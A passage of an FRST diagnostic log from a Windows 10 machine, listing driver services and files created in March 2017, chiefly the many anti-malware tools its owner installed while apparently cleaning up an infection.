U3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispiwu.inf_amd64_b67dc924fff8de6d\nvlddmkm.sys [14199224 2017-01-04] (NVIDIA Corporation)
U3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [27584 2017-02-23] (NVIDIA Corporation)
U3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [46016 2017-01-20] (NVIDIA Corporation)
U3 nvvhci; C:\WINDOWS\System32\drivers\nvvhci.sys [57792 2017-02-23] (NVIDIA Corporation)
U3 Parport; C:\WINDOWS\System32\drivers\parport.sys [96768 2016-07-16] (Microsoft Corporation) [File not signed]
U2 PEAUTH; C:\WINDOWS\System32\drivers\peauth.sys [723968 2016-07-16] (Microsoft Corporation) [File not signed]
U3 PptpMiniport; C:\WINDOWS\System32\drivers\raspptp.sys [96256 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Processor; C:\WINDOWS\System32\drivers\processr.sys [119808 2016-07-16] (Microsoft Corporation) [File not signed]
U3 QWAVEdrv; C:\WINDOWS\system32\drivers\qwavedrv.sys [48640 2016-07-16] (Microsoft Corporation) [File not signed]
U3 RasAcd; C:\WINDOWS\System32\DRIVERS\rasacd.sys [17408 2016-07-16] (Microsoft Corporation) [File not signed]
U3 RasAgileVpn; C:\WINDOWS\System32\drivers\AgileVpn.sys [107520 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Rasl2tp; C:\WINDOWS\System32\drivers\rasl2tp.sys [104960 2016-07-16] (Microsoft Corporation) [File not signed]
U3 RasPppoe; C:\WINDOWS\System32\DRIVERS\raspppoe.sys [81408 2016-07-16] (Microsoft Corporation) [File not signed]
U3 RasSstp; C:\WINDOWS\System32\drivers\rassstp.sys [77824 2016-07-16] (Microsoft Corporation) [File not signed]
U1 RawDisk3; C:\Windows\system32\drivers\rawdsk3.sys [32568 2015-08-15] (EldoS Corporation)
U3 rdpbus; C:\WINDOWS\System32\drivers\rdpbus.sys [26112 2016-07-16] (Microsoft Corporation) [File not signed]
U3 RDPDR; C:\WINDOWS\System32\drivers\rdpdr.sys [177152 2016-07-16] (Microsoft Corporation) [File not signed]
U2 rspndr; C:\WINDOWS\System32\drivers\rspndr.sys [81408 2016-07-16] (Microsoft Corporation) [File not signed]
U3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [886528 2015-05-29] (Realtek )
U3 s3cap; C:\WINDOWS\System32\drivers\vms3cap.sys [9216 2016-07-16] (Microsoft Corporation) [File not signed]
U3 scfilter; C:\WINDOWS\System32\DRIVERS\scfilter.sys [43008 2016-07-16] (Microsoft Corporation) [File not signed]
U3 scmdisk0101; C:\WINDOWS\System32\drivers\scmdisk0101.sys [123904 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Serenum; C:\WINDOWS\System32\drivers\serenum.sys [25088 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Serial; C:\WINDOWS\System32\drivers\serial.sys [83968 2016-07-16] (Microsoft Corporation) [File not signed]
U3 sermouse; C:\WINDOWS\System32\drivers\sermouse.sys [27648 2016-07-16] (Microsoft Corporation) [File not signed]
U3 sfloppy; C:\WINDOWS\System32\drivers\sfloppy.sys [18432 2016-07-16] (Microsoft Corporation) [File not signed]
U2 srv; C:\WINDOWS\System32\DRIVERS\srv.sys [410112 2017-03-04] (Microsoft Corporation) [File not signed]
U3 srv2; C:\WINDOWS\System32\DRIVERS\srv2.sys [713216 2016-11-11] (Microsoft Corporation) [File not signed]
U3 srvnet; C:\WINDOWS\System32\DRIVERS\srvnet.sys [248320 2016-09-27] (Microsoft Corporation) [File not signed]
U2 storqosflt; C:\WINDOWS\System32\drivers\storqosflt.sys [78336 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Synth3dVsc; C:\WINDOWS\System32\drivers\Synth3dVsc.sys [64000 2016-07-16] (Microsoft Corporation) [File not signed]
U2 tcpipreg; C:\WINDOWS\System32\drivers\tcpipreg.sys [52224 2017-03-04] (Microsoft Corporation) [File not signed]
U3 tsusbflt; C:\WINDOWS\System32\drivers\TsUsbFlt.sys [61440 2016-07-16] (Microsoft Corporation) [File not signed]
U3 TsUsbGD; C:\WINDOWS\System32\drivers\TsUsbGD.sys [34304 2016-07-16] (Microsoft Corporation) [File not signed]
U3 tunnel; C:\WINDOWS\System32\drivers\tunnel.sys [158208 2016-07-16] (Microsoft Corporation) [File not signed]
U3 UcmCx0101; C:\WINDOWS\System32\Drivers\UcmCx.sys [95744 2016-07-16] (Microsoft Corporation) [File not signed]
U3 UcmTcpciCx0101; C:\WINDOWS\System32\Drivers\UcmTcpciCx.sys [108544 2016-07-16] (Microsoft Corporation) [File not signed]
U3 UcmUcsi; C:\WINDOWS\System32\drivers\UcmUcsi.sys [50688 2016-07-16] (Microsoft Corporation) [File not signed]
U3 UdeCx; C:\WINDOWS\System32\drivers\udecx.sys [45568 2016-07-16] (Microsoft Corporation) [File not signed]
U4 udfs; C:\WINDOWS\System32\DRIVERS\udfs.sys [320000 2016-07-16] (Microsoft Corporation) [File not signed]
U3 umbus; C:\WINDOWS\System32\drivers\umbus.sys [56832 2016-07-16] (Microsoft Corporation) [File not signed]
U3 UmPass; C:\WINDOWS\System32\drivers\umpass.sys [13824 2016-07-16] (Microsoft Corporation) [File not signed]
U3 usbaudio; C:\WINDOWS\system32\drivers\usbaudio.sys [132096 2016-07-16] (Microsoft Corporation) [File not signed]
U3 usbcir; C:\WINDOWS\System32\drivers\usbcir.sys [102400 2016-07-16] (Microsoft Corporation) [File not signed]
U3 usbohci; C:\WINDOWS\System32\drivers\usbohci.sys [30208 2016-07-16] (Microsoft Corporation) [File not signed]
U3 usbprint; C:\WINDOWS\System32\drivers\usbprint.sys [27648 2016-07-16] (Microsoft Corporation) [File not signed]
U3 usbser; C:\WINDOWS\System32\drivers\usbser.sys [69120 2016-07-16] (Microsoft Corporation) [File not signed]
U3 usbuhci; C:\WINDOWS\System32\drivers\usbuhci.sys [35328 2016-07-16] (Microsoft Corporation) [File not signed]
U3 usbvideo; C:\WINDOWS\System32\Drivers\usbvideo.sys [226816 2016-09-27] (Microsoft Corporation) [File not signed]
U3 vhf; C:\WINDOWS\System32\drivers\vhf.sys [32256 2016-07-16] (Microsoft Corporation) [File not signed]
U3 VMBusHID; C:\WINDOWS\System32\drivers\VMBusHID.sys [25088 2016-07-16] (Microsoft Corporation) [File not signed]
U3 vmgid; C:\WINDOWS\System32\drivers\vmgid.sys [10240 2016-07-16] (Microsoft Corporation) [File not signed]
U3 vwifibus; C:\WINDOWS\System32\drivers\vwifibus.sys [26624 2016-07-16] (Microsoft Corporation) [File not signed]
U1 vwififlt; C:\WINDOWS\System32\drivers\vwififlt.sys [73216 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WacomPen; C:\WINDOWS\System32\drivers\wacompen.sys [30208 2016-07-16] (Microsoft Corporation) [File not signed]
U2 wanarp; C:\WINDOWS\System32\DRIVERS\wanarp.sys [79872 2016-07-16] (Microsoft Corporation) [File not signed]
U3 wanarpv6; C:\WINDOWS\System32\DRIVERS\wanarp.sys [79872 2016-07-16] (Microsoft Corporation) [File not signed]
U2 wcnfs; C:\WINDOWS\system32\drivers\wcnfs.sys [66560 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
U3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
U3 wdiwifi; C:\WINDOWS\System32\DRIVERS\wdiwifi.sys [719872 2017-03-04] (Microsoft Corporation) [File not signed]
U3 wdm_usb; C:\WINDOWS\system32\DRIVERS\usb2ser.sys [159936 2016-08-16] (MBB)
U3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
U2 WIBUKEY; C:\WINDOWS\System32\DRIVERS\WibuKey64.sys [106760 2013-12-18] (WIBU-SYSTEMS AG)
U3 WINUSB; C:\WINDOWS\System32\drivers\WinUSB.SYS [89088 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WmiAcpi; C:\WINDOWS\System32\drivers\wmiacpi.sys [18432 2016-07-16] (Microsoft Corporation) [File not signed]
U4 ws2ifsl; C:\WINDOWS\system32\drivers\ws2ifsl.sys [22528 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WudfPf; C:\WINDOWS\System32\drivers\WudfPf.sys [99328 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WUDFRd; C:\WINDOWS\System32\drivers\WudfRd.sys [216064 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WUDFWpdFs; C:\WINDOWS\system32\DRIVERS\WUDFRd.sys [216064 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WUDFWpdMtp; C:\WINDOWS\system32\DRIVERS\WUDFRd.sys [216064 2016-07-16] (Microsoft Corporation) [File not signed]
U3 xboxgip; C:\WINDOWS\System32\drivers\xboxgip.sys [258560 2017-03-04] (Microsoft Corporation) [File not signed]
U3 xinputhid; C:\WINDOWS\System32\drivers\xinputhid.sys [43520 2016-09-27] (Microsoft Corporation) [File not signed]
U3 xusb22; C:\WINDOWS\System32\drivers\xusb22.sys [95744 2016-07-16] (Microsoft Corporation) [File not signed]
U1 ZAM; C:\WINDOWS\System32\drivers\zam64.sys [203680 2017-03-16] (Zemana Ltd.)
U1 ZAM_Guard; C:\WINDOWS\System32\drivers\zamguard64.sys [203680 2017-03-16] (Zemana Ltd.)
U1 ekswxtuc; \??\C:\WINDOWS\system32\drivers\ekswxtuc.sys [X]
U1 xlkgrbft; \??\C:\WINDOWS\system32\drivers\xlkgrbft.sys [X]
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2017-03-16 16:40 - 2017-03-16 16:41 - 00042454 _____ C:\Users\Nekut\Desktop\Addition.txt
2017-03-16 16:38 - 2017-03-16 16:46 - 00062427 _____ C:\Users\Nekut\Desktop\FRST.txt
2017-03-16 16:34 - 2017-03-16 16:46 - 00000000 ____D C:\FRST
2017-03-16 16:34 - 2017-03-16 16:34 - 02424832 _____ (Farbar) C:\Users\Nekut\Desktop\FRST64.exe
2017-03-16 16:34 - 2017-03-16 16:34 - 00001956 _____ C:\WINDOWS\system32\Drivers\fvstore.dat
2017-03-16 16:34 - 2017-03-16 16:34 - 00000000 ___HD C:\VTRoot
2017-03-16 16:21 - 2017-03-16 16:47 - 00024411 _____ C:\WINDOWS\ZAM.krnl.trace
2017-03-16 16:21 - 2017-03-16 16:47 - 00014878 _____ C:\WINDOWS\ZAM_Guard.krnl.trace
2017-03-16 16:21 - 2017-03-16 16:21 - 00203680 _____ (Zemana Ltd.) C:\WINDOWS\system32\Drivers\zamguard64.sys
2017-03-16 16:21 - 2017-03-16 16:21 - 00203680 _____ (Zemana Ltd.) C:\WINDOWS\system32\Drivers\zam64.sys
2017-03-16 16:21 - 2017-03-16 16:21 - 00001223 _____ C:\Users\Public\Desktop\Zemana AntiMalware.lnk
2017-03-16 16:21 - 2017-03-16 16:21 - 00000000 ____D C:\Users\Nekut\AppData\Local\Zemana
2017-03-16 16:21 - 2017-03-16 16:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Zemana AntiMalware
2017-03-16 16:21 - 2017-03-16 16:21 - 00000000 ____D C:\Program Files (x86)\Zemana AntiMalware
2017-03-16 16:20 - 2017-03-16 16:20 - 05755024 _____ (Zemana Ltd. ) C:\Users\Nekut\Downloads\Zemana.AntiMalware.Setup.exe
2017-03-15 22:01 - 2017-03-16 16:38 - 01038464 _____ C:\WINDOWS\system32\Drivers\sfi.dat
2017-03-15 22:01 - 2017-03-15 22:01 - 00001904 _____ C:\Users\Public\Desktop\COMODO Internet Security.lnk
2017-03-15 22:01 - 2017-03-15 22:01 - 00000000 ____D C:\WINDOWS\System32\Tasks\COMODO
2017-03-15 22:01 - 2017-03-15 22:01 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\COMODO
2017-03-15 22:00 - 2017-03-15 22:00 - 00000000 ____D C:\ProgramData\Shared Space
2017-03-15 22:00 - 2017-03-15 22:00 - 00000000 ____D C:\ProgramData\Comodo Downloader
2017-03-15 22:00 - 2017-03-15 22:00 - 00000000 ____D C:\ProgramData\Comodo
2017-03-15 22:00 - 2017-03-15 22:00 - 00000000 ____D C:\Program Files\COMODO
2017-03-15 21:58 - 2017-03-15 21:59 - 73804768 _____ (COMODO) C:\Users\Nekut\Downloads\cispremium_only_installer.exe
2017-03-15 21:55 - 2017-03-15 21:55 - 00000085 _____ C:\WINDOWS\wininit.ini
2017-03-15 21:23 - 2017-03-15 21:58 - 00111544 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys
2017-03-15 21:18 - 2017-03-15 21:18 - 00000000 ____D C:\ProgramData\ProcessLasso
2017-03-15 21:10 - 2017-03-15 21:00 - 00024064 _____ C:\WINDOWS\zoek-delete.exe
2017-03-15 21:00 - 2017-03-15 21:09 - 00000000 ____D C:\zoek_backup
2017-03-15 20:59 - 2017-03-15 21:00 - 01309184 _____ C:\Users\Nekut\Downloads\zoek.exe
2017-03-15 20:55 - 2017-03-15 20:55 - 00000000 ____D C:\Users\Nekut\AppData\Local\Adobe
2017-03-15 19:40 - 2017-03-15 20:15 - 03182592 _____ C:\Users\Nekut\Downloads\Nabozenstvi.ppt
2017-03-15 19:35 - 2017-03-15 19:35 - 02073600 _____ C:\Users\Nekut\Downloads\DUM_cihakova_Svetova_nabozenstvi.ppt
2017-03-15 18:32 - 2017-03-15 20:26 - 00028272 _____ C:\WINDOWS\system32\Drivers\TrueSight.sys
2017-03-15 18:32 - 2017-03-15 18:59 - 00000000 ____D C:\ProgramData\RogueKiller
2017-03-15 18:30 - 2017-03-15 18:31 - 26131528 _____ C:\Users\Nekut\Downloads\RogueKillerX64.exe
2017-03-15 18:17 - 2017-03-15 18:17 - 00000000 ____D C:\ProgramData\Sophos
2017-03-15 18:16 - 2017-03-15 18:16 - 00002775 _____ C:\Users\Public\Desktop\Sophos Virus Removal Tool.lnk
2017-03-15 18:16 - 2017-03-15 18:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sophos
2017-03-15 18:16 - 2017-03-15 18:16 - 00000000 ____D C:\Program Files (x86)\Sophos
2017-03-15 18:12 - 2017-03-15 18:16 - 164051504 _____ (Sophos Limited) C:\Users\Nekut\Downloads\Sophos Virus Removal Tool.exe
2017-03-15 17:57 - 2017-03-15 17:58 - 01663904 _____ (Malwarebytes) C:\Users\Nekut\Downloads\JRT.exe
2017-03-15 17:31 - 2017-03-15 21:58 - 00186304 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMChameleon.sys
2017-03-15 17:30 - 2017-03-16 16:46 - 00092088 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys
2017-03-15 17:30 - 2017-03-15 21:58 - 00251840 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-03-15 17:30 - 2017-03-15 21:58 - 00043968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2017-03-15 17:30 - 2017-03-15 17:30 - 00001918 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2017-03-15 17:30 - 2017-03-15 17:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-03-15 17:30 - 2017-03-15 17:30 - 00000000 ____D C:\Program Files\Malwarebytes
2017-03-15 17:30 - 2017-02-24 06:23 - 00077408 _____ C:\WINDOWS\system32\Drivers\mbae64.sys
2017-03-15 17:28 - 2017-03-15 17:29 - 57131432 _____ (Malwarebytes ) C:\Users\Nekut\Downloads\mb3-setup-consumer-3.0.6.1469-1075.exe
2017-03-15 17:23 - 2017-03-15 17:51 - 00000000 ____D C:\AdwCleaner
2017-03-15 17:22 - 2017-03-15 17:23 - 04031440 _____ C:\Users\Nekut\Desktop\AdwCleaner.exe
2017-03-15 17:14 - 2017-03-15 17:14 - 00448512 _____ (OldTimer Tools) C:\Users\Nekut\Downloads\TFC.exe
2017-03-15 17:09 - 2017-03-15 17:10 - 00050688 _____ (Atribune.org) C:\Users\Nekut\Downloads\ATF-Cleaner.exe
2017-03-14 19:18 - 2017-03-14 19:18 - 00388608 _____ (Trend Micro Inc.) C:\Users\Nekut\Downloads\HijackThis.exe
2017-03-14 18:36 - 2017-03-04 08:57 - 00484584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2017-03-14 18:36 - 2017-03-04 08:57 - 00315744 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2017-03-14 18:36 - 2017-03-04 08:40 - 00965472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ReAgent.dll
2017-03-14 18:36 - 2017-03-04 08:24 - 00090976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\IPMIDrv.sys
2017-03-14 18:36 - 2017-03-04 08:09 - 02206496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msmpeg2vdec.dll
2017-03-14 18:36 - 2017-03-04 08:09 - 01969912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hevcdecoder.dll
2017-03-14 18:36 - 2017-03-04 08:09 - 00497416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dnsapi.dll
2017-03-14 18:36 - 2017-03-04 08:08 - 00130912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storahci.sys
2017-03-14 18:36 - 2017-03-04 08:07 - 00557400 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spaceport.sys
2017-03-14 18:36 - 2017-03-04 08:04 - 02048496 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-03-14 18:36 - 2017-03-04 08:02 - 00184416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\IPHLPAPI.DLL
2017-03-14 18:36 - 2017-03-04 07:56 - 00263472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Storage.ApplicationData.dll
2017-03-14 18:36 - 2017-03-04 07:56 - 00248992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\policymanager.dll
2017-03-14 18:36 - 2017-03-04 07:54 - 02277288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d11.dll
2017-03-14 18:36 - 2017-03-04 07:54 - 00524776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxgi.dll
2017-03-14 18:36 - 2017-03-04 07:53 - 05722320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2017-03-14 18:36 - 2017-03-04 07:53 - 02256080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-03-14 18:36 - 2017-03-04 07:53 - 01431232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2017-03-14 18:36 - 2017-03-04 07:53 - 00975744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.appcore.dll
2017-03-14 18:36 - 2017-03-04 07:53 - 00861024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2017-03-14 18:36 - 2017-03-04 07:53 - 00781152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2017-03-14 18:36 - 2017-03-04 07:53 - 00493912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
2017-03-14 18:36 - 2017-03-04 07:53 - 00313568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlanapi.dll
2017-03-14 18:36 - 2017-03-04 07:53 - 00136032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostUser.dll
2017-03-14 18:36 - 2017-03-04 07:52 - 00549088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SHCore.dll
2017-03-14 18:36 - 2017-03-04 07:52 - 00272720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wintrust.dll
2017-03-14 18:36 - 2017-03-04 07:51 - 01980768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll
2017-03-14 18:36 - 2017-03-04 07:51 - 00576408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2017-03-14 18:36 - 2017-03-04 07:50 - 00846560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 20969928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 06667528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 04023000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 01853224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 01557808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 01360456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetsrc.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 01344448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsrcsnk.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 01277856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfasfsrcsnk.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 01202384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 01123912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfplat.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 00981376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetcore.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 00976184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfds.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 00952416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 00640976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\evr.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 00530480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mf.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 00374448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFPlay.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 00352760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MMDevAPI.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 00034088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CompPkgSup.dll
2017-03-14 18:36 - 2017-03-04 07:46 - 04312248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2017-03-14 18:36 - 2017-03-04 07:46 - 00321792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LockAppHost.exe
2017-03-14 18:36 - 2017-03-04 07:45 - 00173408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\basecsp.dll
2017-03-14 18:36 - 2017-03-04 07:45 - 00112120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gpapi.dll
2017-03-14 18:36 - 2017-03-04 07:42 - 01415240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2017-03-14 18:36 - 2017-03-04 07:42 - 01260784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll